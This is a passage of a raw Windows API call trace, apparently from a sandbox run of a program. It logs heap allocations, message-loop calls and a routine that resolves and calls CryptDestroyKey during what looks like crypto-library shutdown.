lpOverlapped=0x0) returned 1 [0244.081] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0244.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0244.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0244.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0244.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0244.082] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0244.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0244.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0244.082] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0244.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0244.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0244.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0244.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0244.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0244.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0244.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0244.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e48 [0244.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0244.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0244.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d88 [0244.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0244.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0244.082] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0244.082] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0244.083] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d28 [0244.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55bc8 [0244.283] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0244.283] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0244.283] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55bc8 | out: hHeap=0x970000) returned 1 [0244.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0244.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d70 [0244.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d38 [0244.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0244.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0244.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0244.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0244.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0244.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0244.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0244.284] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0244.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0244.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0244.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0244.284] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 1 [0244.284] TranslateMessage (lpMsg=0x8cf3a0) returned 0 [0244.284] DispatchMessageW (lpMsg=0x8cf3a0) returned 0x0 [0244.284] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0244.284] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0244.284] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0244.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0244.284] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0244.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0244.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0244.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0244.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0244.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0244.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0244.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0244.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0244.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0244.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0244.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0244.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0244.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0244.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0244.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0244.285] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0244.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0244.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0244.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0244.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0244.285] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0244.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0244.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0244.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0244.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0244.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0244.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0244.285] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0244.285] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0244.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0244.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0244.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0244.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0244.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0244.286] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0244.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0244.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0244.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0244.286] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0244.286] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0244.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0244.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0244.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0244.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0244.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0244.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0244.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0244.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0244.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0244.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0244.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0244.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51280, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0244.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0244.287] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0244.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0244.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0244.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0244.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0244.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0244.287] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0244.287] CryptDestroyKey (hKey=0xa87110) returned 1 [0244.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0244.287] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0244.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0244.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0244.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0244.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0244.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0244.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0244.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0244.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0244.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0244.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0244.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0244.288] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0244.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0244.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0244.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0244.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51148 | out: hHeap=0x970000) returned 1 [0244.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0244.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0244.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0244.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0244.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0244.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0244.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0244.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0244.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0244.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0244.288] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0244.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0244.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0244.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0244.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0244.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0244.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0244.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0244.289] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0244.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0244.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0244.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0244.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0244.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0244.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0244.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0244.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0244.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0244.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0244.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0244.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0244.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0244.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0244.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0244.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0244.289] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0244.289] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0244.289] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0244.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0244.290] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0244.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0244.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0244.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ef0 [0244.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0244.290] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0244.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55bc8 [0244.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0244.290] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0244.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55bc8 | out: hHeap=0x970000) returned 1 [0244.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0244.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ec0 [0244.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0244.290] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0244.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0244.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0244.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0244.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0244.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0244.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0244.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0244.290] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0244.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0244.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0244.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0244.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0244.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d10 [0244.290] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0244.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0244.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0244.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f50 [0244.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0244.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50de8 [0244.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0244.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0244.291] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0244.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0244.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0244.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0244.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0244.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0244.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0244.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0244.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0244.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0244.291] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0244.291] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 